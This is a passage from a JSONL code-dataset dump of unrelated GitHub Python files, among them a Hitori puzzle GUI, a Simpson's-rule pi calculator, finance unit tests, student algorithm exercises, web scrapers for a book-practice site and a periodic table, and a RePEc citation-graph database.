self.cols()-1:\r\n\t\t\t\t\tif (matrice2[y][x] == BLACK and matrice2[y][x + 1] == BLACK):\r\n\t\t\t\t\t\tfinitoNeriR += 1\r\n\t\treturn finitoNeriR\r\n\r\n\t#metodo che controlla che non ci siano celle annerite vicine in una colonna\r\n\tdef controlloCelleNereColonne(self) -> int:\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoNeriC = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tif x < self.cols()-1:\r\n\t\t\t\t\tif (matrice2[x][y] == BLACK and matrice2[x + 1][y] == BLACK):\r\n\t\t\t\t\t\tfinitoNeriC += 1\r\n\t\treturn finitoNeriC\r\n\r\n\t#metodo che controlla se c'è una cella chiusa da celle nere\r\n\tdef cellaBiancaChiusa(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\r\n\t\tcelleBiancheChiuse = 0\r\n\r\n\t\ttry:\r\n\t\t\tfor x in range(self.rows()):\r\n\t\t\t\tfor y in range(self.cols()):\r\n\t\t\t\t\tif x == 0:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y - 1] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\r\n\t\t\t\t\telif x == self.cols()-1:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y + 1] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\texcept:\r\n\t\t\tpass\r\n\r\n\t\treturn celleBiancheChiuse\r\n\r\n\t#metodo che controlla mossa per i suggerimenti : NON funzionante\r\n\tdef wrong(self) -> bool:\r\n\r\n\t\tif (self.controlloCelleNereRighe() == 0\r\n\t\t\t\tand self.controlloCelleNereColonne() == 0 and self.cellaBiancaChiusa() == 0):\r\n\t\t\treturn False\r\n\t\telse :\r\n\t\t\treturn True\r\n\r\n\t#Suggerimenti : NON funzionante\r\n\tdef suggerimenti(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tsupp = matrice2[y][x]\r\n\t\t\t\tmatrice2[y][x] = BLACK\r\n\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\tif self.wrong() :\r\n\t\t\t\t\tmatrice2[y][x] = 0\r\n\t\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\t\tself.flag_at(x,y)\r\n\t\t\t\telse :\r\n\t\t\t\t\tmatrice2[y][x] = 0\r\n\t\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\t\tself.play_at(x,y,0)\r\n\r\n\t#Automatismi: metodo per annerire in automatico in base alla celle cerchiate\r\n\tdef annerireAuto(self,x1: int, y1: int):\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatriceVal = self.getMatrice()\r\n\r\n\t\tfor y in range (self.rows()) :\r\n\t\t\tif matrice[x1][y] == matrice[x1][y1] and y != y1:\r\n\t\t\t\tself.play_at(y,x1,1)\r\n\r\n\t\tfor x in range (self.cols()) :\r\n\t\t\tif matrice[x][y1] == matrice[x1][y1] and x != x1:\r\n\t\t\t\tself.play_at(y1,x,1)\r\n\r\n\t#metodo per annerire una cella\r\n\tdef play_at(self, x: int, y: int, val: int):\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatOriginale = self.getMatriceOriginale()\r\n\r\n\t\tmatOriginale[y][x] = matrice[y][x] #salva il valore numerico che c'era prima che la cella fosse annerita\r\n\t\tmatriceVal[y][x] = BLACK\r\n\r\n\t\t#se attivato l'automatismo cerchia le celle automaticamente\r\n\t\tauto = self.getValAutomatismi()\r\n\t\tif auto == 1 and val == 0:\r\n\t\t\tif x == 0:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\telif x == self.cols()-1:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\telse:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x-1, y)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x,y+1)\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x+1, y )\r\n\t\t\t\t\tself.flag_at(x-1, y )\r\n\t\t\r\n\t\tself.setMatriceOriginale(matOriginale)\r\n\t\tself.setMatrice(matriceVal)\r\n\r\n\t#metodo per cerchiare una cella\r\n\tdef flag_at(self, x: int, y: int):\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatOriginale = self.getMatriceOriginale()\r\n\r\n\t\tmatOriginale[y][x] = matrice[y][x] #salva il valore numerico che c'era prima che la cella fosse cerchiata\r\n\t\tmatriceVal[y][x] = CIRCLE\r\n\r\n\t\tself.setMatriceOriginale(matOriginale)\r\n\t\tself.setMatrice(matriceVal)\r\n\r\n\t\t#se attivato l'automatismo chiama il metodo annerireAuto()\r\n\t\tauto = self.getValAutomatismi()\r\n\t\tif auto == 1:\r\n\t\t\tself.annerireAuto(y,x)\r\n\r\n\t#metodo che serve per ritornare il valore numerico originale per una cella annerita o cerchiata\r\n\tdef returnOldValue(self, x: int, y: int) -> int:\r\n\t\tmatrice = self.getMatriceOriginale()\r\n\t\tmatrice2 = self.getMatrice()\r\n\r\n\t\tmatrice2[y][x] = matrice[y][x]\r\n\r\n\t\tself.setMatrice(matrice2)\r\n\r\n\t\treturn matrice[y][x]\r\n\r\n\t#metodo per ritornare il valore aggiornato di una cella\r\n\tdef value_at(self, x: int, y: int):\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatrice = self.getMatriceGui()\r\n\r\n\t\tif matriceVal[x][y] != BLACK and matriceVal[x][y] != CIRCLE :\r\n\t\t\treturn matrice[x][y]\r\n\t\telse :\r\n\t\t\treturn matriceVal[x][y]\r\n\r\n\tdef message(self, str) -> str:\r\n\t\treturn str\r\n\r\n\r\ndef main():\r\n\r\n\tgame = Hitori()\r\n\tgui_play(game)\r\n\r\nmain()","repo_name":"Gio947/Hitori","sub_path":"Hitori 2.4/Hitori/hitori_gui.py","file_name":"hitori_gui.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42001967231","text":"#!/usr/bin/python\nfrom math import pi,sqrt\n\n# Pi Day code to compute pi with the Simpson's rule\n\n# Integrand that corresponds to a change of variable on calculating the area of\n# a circle\ndef f(y):\n yy=y*y\n return 8*yy*sqrt(2-yy)\n\n# Composite Simpson rule\ndef simp(f,a,b,n):\n\n # Subinterval width\n h=(b-a)/float(n)\n\n # Simpson's formula\n fi=f(a)+f(b)\n for i in range(1,n):\n fi+=4*f(a+(i-0.5)*h)+2*f(a+i*h)\n fi+=4*f(b-0.5*h)\n\n # Return scaled answer\n return fi*h/6.0\n\n# Loop over a range of interval sizes and print absolute error\nj=1\nwhile j<=4096:\n\n # Compute Simpson's rule integral\n s=simp(f,0,1,j)\n\n # Print result and absolute error\n print(j,2/float(j),s,s-pi)\n j*=2\n","repo_name":"chr1shr/math514","sub_path":"calculus/pi_simpsons.py","file_name":"pi_simpsons.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"}
+{"seq_id":"8331826418","text":"from __future__ import annotations\n\nimport numpy as np\nimport pandas as pd\n\nfrom cvx.covariance.ewma import center, clip\n\n\ndef test_center_inactive():\n # Test case 1\n returns = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n halflife = 1\n min_periods = 0\n mean_adj = False\n expected_centered_returns = returns\n centered_returns, mean = center(returns, halflife, min_periods, mean_adj)\n pd.testing.assert_frame_equal(centered_returns, expected_centered_returns)\n pd.testing.assert_frame_equal(mean, 0.0 * returns)\n\n\ndef test_center_active():\n # Test case 2\n returns = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n halflife = 1\n min_periods = 0\n mean_adj = True\n expected_mean = pd.DataFrame(\n {\"a\": [1.0, 1.666667, 2.428571], \"b\": [4.0, 4.666667, 5.4285715]}\n )\n expected_centered_returns = returns.sub(expected_mean)\n\n centered_returns, mean = center(returns, halflife, min_periods, mean_adj)\n pd.testing.assert_frame_equal(centered_returns, expected_centered_returns)\n pd.testing.assert_frame_equal(mean, expected_mean)\n\n\ndef test_clip_1():\n # Test case 1\n data = pd.DataFrame({\"a\": [1, 2, 3, -4], \"b\": [4, -5, 6, 7]})\n clip_at = 5\n expected_data = pd.DataFrame({\"a\": [1, 2, 3, -4], \"b\": [4, -5, 5, 5]})\n clipped_data = clip(data, clip_at)\n assert clipped_data.equals(expected_data)\n\n\ndef test_clip_2():\n # Test case 2\n data = pd.DataFrame(np.random.randn(10, 5), columns=[\"a\", \"b\", \"c\", \"d\", \"e\"])\n clip_at = None\n expected_data = data\n clipped_data = clip(data, clip_at)\n assert clipped_data.equals(expected_data)\n","repo_name":"cvxgrp/cov_pred_finance","sub_path":"tests/test_ewma.py","file_name":"test_ewma.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"3"}
+{"seq_id":"948976083","text":"# File: Modulo.py\r\n\r\n# Description: Determines if a list of integers is closed under modulo (x % y is also a member # of the list for any nonzero x and y in the list)\r\n\r\n# Student Name:\r\n\r\n# Student UT EID:\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: \r\n\r\nimport sys\r\n\r\n# Input: lst is a list of positive integers that includes 0\r\n# Output: return True if for any 2 nonzero elements x and y in the list, x % y is also in the list\r\n# return False otherwise\r\n\r\ndef is_closed_modulo(lst):\r\n \r\n for i in lst:\r\n if i != 0:\r\n #cop1 = lst.copy()\r\n #cop1.remove(i)\r\n for j in lst:\r\n if j != 0:\r\n key = i%j\r\n cop = lst.copy()\r\n cop.remove(i)\r\n if (key in lst) == False:\r\n return False\r\n return True\r\n\r\n\r\ndef main(): \r\n # read input file\r\n lst = [int(x) for x in sys.stdin.readline().strip().split(\" \")]\r\n\r\n # get result from your call to is_closed_modulo()\r\n result = is_closed_modulo(lst)\r\n\r\n # print the result to standard output\r\n print(result)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"sathulkiran/CS313E-A0","sub_path":"Test1/Modulo.py","file_name":"Modulo.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29936572262","text":"# решение с сайта moba 25\ndef partition(competitors, left, right):\n pivot = (competitors[left])\n i = left + 1\n j = right - 1\n while True:\n if (i <= j and competitors[j] > pivot):\n j -= 1\n elif (i <= j and competitors[i] < pivot):\n i += 1\n elif (competitors[j] > pivot) or (competitors[i] < pivot):\n continue\n if i <= j:\n competitors[i], competitors[j] = competitors[j], competitors[i]\n else:\n competitors[left], competitors[j] = competitors[j], competitors[left]\n return j\ndef quick_sort(competitors, left, right):\n if ((right - left) > 1):\n p = partition(competitors, left, right)\n quick_sort(competitors, left, p)\n quick_sort(competitors, p + 1, right)\ndef transformation(competitors):\n competitors[1] = - int(competitors[1])\n competitors[2] = int(competitors[2])\n return [competitors[1], competitors[2], competitors[0]]\n\nif __name__ == '__main__':\n number = int(input())\n competitors = [transformation(input().split()) for _ in range(number)]\n left = 0\n quick_sort(competitors, left, len(competitors))\n print(*(list(zip(*competitors))[2]), sep=\"\\n\")\n","repo_name":"gusevskiy/algorithms","sub_path":"algorithms_practikum/13_sprint/final_13/very_quik_sort_2.py","file_name":"very_quik_sort_2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"70038918161","text":"class ComponentItem(object):\n\n # constructor\n # \\param node DOM node of item\n # \\param parent patent instance\n def __init__(self, node, parent=None):\n # DOM node\n self.node = node\n # list with child items\n self.__childItems = []\n # the parent ComponentItem of the item\n self.parent = parent\n\n # provides indexs of given child\n # \\param child\n # \\returns child index\n def index(self, child):\n return self.__childItems.index(child)\n\n # provides a number of the current item\n # \\returns a number of the current item\n def childNumber(self):\n if self.parent:\n return self.parent.index(self)\n return 0\n\n # provides the child item for the given list index\n # \\param i child index\n # \\returns requested child Item\n def child(self, i):\n size = len(self.__childItems)\n if i in range(size):\n return self.__childItems[i]\n if i >= 0 and i < self.node.childNodes().count():\n for j in range(size, i + 1):\n childNode = self.node.childNodes().item(j)\n childItem = ComponentItem(childNode, self)\n self.__childItems.append(childItem)\n return childItem\n\n # removes the given children from the child item list\n # \\param position list index of the first child to remove\n # \\param count number of children to remove\n # \\returns if indices not out of range\n def removeChildren(self, position, count):\n if position < 0 or position + count > self.node.childNodes().count():\n return False\n\n for _ in range(count):\n if position < len(self.__childItems):\n self.__childItems.pop(position)\n\n return True\n\n # inserts the given children into the child item list\n # \\param position list index of the first child to remove\n # \\param count number of children to remove\n # \\returns if indices not out of range\n def insertChildren(self, position, count):\n\n if position < 0 or position > self.node.childNodes().count():\n return False\n\n for i in range(position, position + count):\n if position <= len(self.__childItems):\n childNode = self.node.childNodes().item(i)\n childItem = ComponentItem(childNode, self)\n self.__childItems.insert(i, childItem)\n\n return True\n\n\nif __name__ == \"__main__\":\n\n from PyQt5.QtXml import QDomNode\n\n # DOM node\n qdn = QDomNode()\n # instance of component item\n di = ComponentItem(qdn, None)\n di.child(0)\n","repo_name":"nexdatas/nxsdesigner","sub_path":"nxsconfigtool/ComponentItem.py","file_name":"ComponentItem.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"540618011","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importing dependencies\nimport requests\nimport time\nimport datetime as dt\nimport csv\nimport re\nfrom bs4 import BeautifulSoup as BS\n\n\n# In[ ]:\n\n\n#Creating CSV that links collected from each store page will be added to\nheader = ['title','link', 'dateAccessed']\nwith open('ProductURL.csv', 'w', newline = '', encoding = 'UTF8') as b:\n writer = csv.writer(b)\n writer.writerow(header)\n \n#Creating CSV that information from each product will be added to\nproductHeader = ['title', 'genre', 'price', 'quantity', 'inStock', 'UPC', 'productType', 'dateAccessed']\nwith open('ProductInformation.csv', 'w', newline = '', encoding = 'UTF8') as a:\n writer = csv.writer(a)\n writer.writerow(productHeader)\n\n#Function for extracting product information\ndef productExtract(url):\n page = requests.get(url, headers = headers)\n soup = BS(page.content, 'html.parser')\n\n #Select the title\n title = soup.html.title.text\n title = title[:title.index('|')].strip()\n\n #Select the genre, which is only located in a breadcrumb list\n genre = soup.find('ul').text\n #Create list of breadcrumb items\n genre = genre.split('\\n')\n genre = list(filter(None, genre))[-2]\n\n #Selecting price\n price = soup.find(class_ = 'price_color').get_text()\n\n #Selecting quantity and availability (inStock)\n #Returns a statement ie: 'In stock (21) available'\n availability = soup.find(class_ = 'instock availability').text\n\n #Selecting quantity by filtering numeric values into a list\n quantity = re.findall(r'\\d+', availability)[0]\n\n #Using quantity to determine availability\n quantity = int(quantity)\n if quantity <= 0:\n inStock = 'no'\n else:\n inStock = 'yes'\n\n #Selecting UPC and product type\n UPC = soup.html.table.td.text\n productType = list(soup.find_all('td'))[1].text\n\n #Determine when data was accessed\n dateAccessed = dt.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\n #Write results onto CSV with product information\n results = [title, genre, price, quantity, inStock, UPC, productType, dateAccessed]\n with open('ProductInformation.csv', 'a+', newline = '', encoding = 'UTF8') as a:\n writer = csv.writer(a)\n writer.writerow(results)\n \n#Function for collecting URL for every product in store page\ndef pageCollect(url2):\n page = requests.get(url2)\n soup = BS(page.content, 'html.parser')\n \n #Collect all containers containing product title and link\n bookContainers = soup.find_all(\"li\", {'class':'col-xs-6 col-sm-4 col-md-3 col-lg-3'})\n\n for container in bookContainers:\n #Select title\n containerTitle = container.find('a').find('img').get('alt')\n \n #Select link\n href = container.find('a').get('href')\n bookLink = 'https://books.toscrape.com/catalogue/' + href\n \n #Determine when data was accessed\n dateAccessed = dt.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n \n #Write results onto CSV with product links\n row = (containerTitle, bookLink, dateAccessed)\n with open('ProductURL.csv', 'a+', newline = '\\n', encoding = 'UTF8') as b:\n writer = csv.writer(b)\n writer.writerow(row)\n productExtract(bookLink)\n \n#Finds total number of product store pages\n#Returns string ie: 'Page 1 of x (x = number of pages)'\nURL1 = 'https://books.toscrape.com/catalogue/frankenstein_20/index.html'\npage = requests.get(URL1, headers = headers)\nsoup = BS(page.content, 'html.parser')\npageNum = soup.find(\"ul\", {\"class\": \"pager\"}).text.strip()\npageTotal = int(pageNum[pageNum.index('of') + 3 : pageNum.index('next')])\n\n#For moving between pages\n#GENERATES A NEW URL\nfor i in range(1, pageTotal + 1):\n print('Currently parsing through page ' + str(i) + '.')\n URL = 'https://books.toscrape.com/catalogue/page-' + str(i) + '.html'\n pageCollect(URL)\n\n","repo_name":"jerometanabe/WebDataCollection","sub_path":"Project Script.py","file_name":"Project Script.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25009702598","text":"import scrapy\nfrom itemloaders import ItemLoader\n\nfrom ..items import PeriodicElementItem\nfrom scrapy_playwright.page import PageMethod\n\n\n# no longer necessary since the pipeline takes care of it (run: scrapy crawl periodic_elements -O elements.json)\n# run: scrapy crawl periodic_elements\n\nclass PeriodicElementsSpider(scrapy.Spider):\n name = \"periodic_elements\"\n allowed_domains = [\"nih.gov\"]\n\n # don't need: start_urls = [\"/\"] since we're just working with 1 url\n\n def start_requests(self):\n # override start_requests to use scrapy-playwright\n yield scrapy.Request('https://pubchem.ncbi.nlm.nih.gov/ptable/',\n meta=dict(\n playwright=True,\n playwright_page_methods=[\n PageMethod(\"wait_for_selector\", \"div.ptable\")\n ]\n ))\n\n # \"async\" since we're waiting for the \"div.ptable\" selector above\n async def parse(self, response):\n for element in response.css(\"div.ptable div.element\"):\n i = ItemLoader(item=PeriodicElementItem(), selector=element)\n\n # [] attribute selector\n i.add_css(\"symbol\", '[data-tooltip=\"Symbol\"]')\n i.add_css(\"name\", '[data-tooltip=\"Name\"]')\n i.add_css(\"atomic_number\", '[data-tooltip=\"Atomic Number\"]')\n i.add_css(\"atomic_mass\", '[data-tooltip*=\"Atomic Mass\"]')\n i.add_css(\"chemical_group\", '[data-tooltip=\"Chemical Group Block\"]')\n\n yield i.load_item()\n","repo_name":"dmitriygrushin/scrap-periodic-table-scrapy-playwright-no-api","sub_path":"elems/elems/spiders/periodic_elements.py","file_name":"periodic_elements.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39654560327","text":"import os\nimport itertools\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nfrom sqlalchemy import Column, Integer, String, Table, ForeignKey, create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\nfrom repeci.RFS import RFS\nfrom repeci.config import *\n\n\n__author__ = \"Anton Tarasenko \"\n\n\nBase = declarative_base()\n\npapers2authors_table = Table('papers2authors', Base.metadata,\n Column('paper_id', Integer, ForeignKey('papers.id')),\n Column('author_id', Integer, ForeignKey('authors.id'))\n)\npapers2jel_table = Table('papers2jel', Base.metadata,\n Column('paper_id', Integer, ForeignKey('papers.id')),\n Column('jel_id', Integer, ForeignKey('jel.id'))\n)\nciting2cited_table = Table('citing2cited', Base.metadata,\n Column('citing', Integer, ForeignKey('papers.id'), primary_key=True),\n Column('cited', Integer, ForeignKey('papers.id'), primary_key=True)\n)\n\nclass Paper(Base):\n __tablename__ = \"papers\"\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n year = Column(Integer)\n handle = Column(String, unique=True)\n # meta = [\"1\", \"2\"] # handle.split(\":\")\n # provider = column_property(str(handle).split(\":\")[1])\n # series = column_property(meta[2])\n\n refs = relationship(\"Paper\",\n secondary=\"citing2cited\",\n primaryjoin=\"Paper.id==citing2cited.c.citing\",\n secondaryjoin=\"Paper.id==citing2cited.c.cited\",\n backref=\"cited_by\")\n authors = relationship(\"Author\",\n secondary=\"papers2authors\",\n backref=\"papers\")\n jel = relationship(\"JEL\",\n secondary=\"papers2jel\",\n backref=\"papers\")\n def __repr__(self):\n hsplit = self.handle.split(\":\")\n url = \"http://ideas.repec.org/p/%s/%s.html\" % (\"/\".join(hsplit[1:3]), \"\".join(hsplit[3:]))\n return '' % (self.id, url)\n\nclass Author(Base):\n __tablename__ = \"authors\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, unique=True)\n code = Column(String, unique=True)\n\n def __repr__(self):\n return \"\" % (self.id, self.name, self.code)\n\nclass JEL(Base):\n __tablename__ = \"jel\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n code = Column(String, unique=True)\n\n def __repr__(self):\n return \"\" % (self.id, self.name, self.code)\n\nclass DB():\n def __init__(self):\n engine = create_engine('sqlite:///' + REPECI_DB, echo=False)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n self.s = session\n\n def pd(self):\n df = pd.DataFrame(self.s.\\\n query(Paper.title, Paper.year, Author.name, JEL.code).\\\n join(Paper.authors).\\\n join(Paper.jel).\\\n all(),\n columns=['title', 'year', 'author', 'jel'])\n print(\"Exported to DataFrame\")\n return df\n\n def ba_table(self):\n df = self.pd()\n tab = pd.DataFrame(columns=['k', 'i', 'j', 'B_ijk', 'A_ijk', 'C_ijk', 'N_ijk'])\n for k in set(df['title'].tolist()):\n year = df[df['title'] == k]['year'].tolist()[0]\n authors = set(df[df['title'] == k]['author'].tolist())\n for i, j in [itertools.permutations(authors, 2)]:\n B_ijk = set(df[df['title'] == k & df['year'] < year]['jel'].tolist())\n A_ijk = set(df[df['title'] == k & df['year'] > year]['jel'].tolist())\n C_ijk = B_ijk & A_ijk\n N_ijk = A_ijk - C_ijk\n\n for row in tab.iterrows():\n i, j = row[1]['i'], row[1]['j']\n ix = tab.i == i & tab.j == j\n tab[ix]['T_jik'] = tab[tab.j == i & tab.i == j]['B_ijk'] & tab['N_ijk']\n tab[ix]['r_jik'] = len(tab[ix]['T_jik']) / len(tab[ix]['A_ijk'])\n\n r_ji = tab['r_jik'].groupby(['i', 'j']).agg['mean']\n return r_ji\n\n def import_refs(self, file, n=0):\n lines = list()\n with open(file) as f:\n if n == 0:\n lines = f.read().splitlines()\n else:\n c = 0\n while c < n:\n lines.append(f.readline().strip())\n c += 1\n print(len(lines), \"lines read\")\n for line in lines:\n sep = line.split(sep=\" \")\n cited = sep[0]\n cited_instance = self.s.query(Paper).filter(Paper.handle == cited).first()\n if cited_instance is None:\n cited_instance = Paper(handle=cited)\n for citing in set(sep[1].split(sep=\"#\")):\n citing_instance = self.s.query(Paper).filter(Paper.handle == citing).first()\n if citing_instance is None:\n citing_instance = Paper(handle=citing)\n if citing_instance.handle != cited_instance.handle:\n cited_instance.cited_by.append(citing_instance)\n self.s.add(cited_instance)\n self.s.flush()\n self.s.commit()\n\n def ref_graph(self):\n s = time.perf_counter()\n s2 = time.perf_counter()\n # MultiDiGraph isn't supported by pagerank() and other algorithms\n G = nx.DiGraph()\n G.add_edges_from(self.s.query(citing2cited_table).all())\n '''\n for (citing, cited) in self.s.query(citing2cited_table).all():\n for i, (cited,) in enumerate(self.s.query(Paper.handle).all(), 1):\n for (citing,) in self.s.query(Paper.handle).filter(Paper.refs.any(Paper.handle == cited)).all():\n G.add_edge(cited, citing)\n if i % 100 == 0:\n e2 = time.perf_counter()\n print(\"%d cited papers processed in %d seconds\" % (i, round(e2 - s2, 1)))\n s2 = time.perf_counter()\n '''\n e = time.perf_counter()\n\n print(\"Graph building is completed in %d seconds\" % round(e - s, 1))\n return G\n\n def ref_metrics(self, G):\n '''\n See https://networkx.github.io/documentation/latest/reference/algorithms.html for algorithms.\n Some algorithms don't support directed graphs. More comments on each algorithm in respect to directed graphs.\n Edges in graph G are directed from a to b in (a, b), where a cites b.\n :param G: graph\n :return: a dataframe of network statistics for each node.\n '''\n\n s = time.perf_counter()\n\n df = pd.DataFrame([ # Equals the number of references in a paper as (2, 1) is \"2\" citing \"1\"\n nx.out_degree_centrality(G),\n # Equals the number of citations\n nx.in_degree_centrality(G),\n # (1, 3) and (2, 3) give PageRank to \"3\"\n nx.pagerank(G),\n # (1, 2, 3) gives 0 to \"3\" as it can't reach any other nodes\n # Since \"if the graph is not completely connected, this algorithm computes the closeness\n # centrality for each connected part separately,\" ensure that all papers are connected\n nx.closeness_centrality(G),\n # (2, 3, 4) and (4, 3, 2) give higher betweenness to \"3\" than (2, 3, 4) alone does\n # nx.betweenness_centrality(G),\n # nx.current_flow_betweenness_centrality(G),\n # nx.current_flow_closeness_centrality(G),\n # nx.eigenvector_centrality(G)\n ]).T\n df.columns = ['odc', 'idc', 'pr', 'cc',\n # 'bc', 'cfbc', 'cfcc', 'ec'\n ]\n\n e = time.perf_counter()\n print(\"Metrics is computed in %d seconds\" % round(e - s, 1))\n return df\n\n def ref_pagerank_a(self, G):\n '''\n Check `nx.pagerank()` sensitivity for alpha.\n :param G: graph\n :return: pd.DataFrame of comparative statistics\n '''\n df = pd.DataFrame()\n for a in np.arange(.5, 1, .05):\n nxpr = nx.pagerank(G, alpha=a)\n df = df.join(pd.DataFrame(list(nxpr.values()),\n columns=[str(a)],\n index=nxpr.keys()),\n how='outer')\n return df\n\n def import_rdf(self, file):\n with open(file, 'r', encoding='latin-1') as f:\n lines = f.readlines()\n paper = Paper()\n is_article = False\n for line in lines:\n br = line.find(':')\n k = line[:br]\n v = line[br+1:].strip()\n\n if k.lower() == \"template-type\":\n is_article = True if v == \"ReDIF-Article 1.0\" else False\n\n if is_article:\n if k == \"Title\":\n paper.title = v\n elif k == \"Year\":\n paper.year = v\n elif k == \"Author-Name\":\n author = self.s.query(Author).filter(Author.name == v).first()\n if author is None:\n author = Author(name=v)\n paper.authors.append(author)\n elif k == 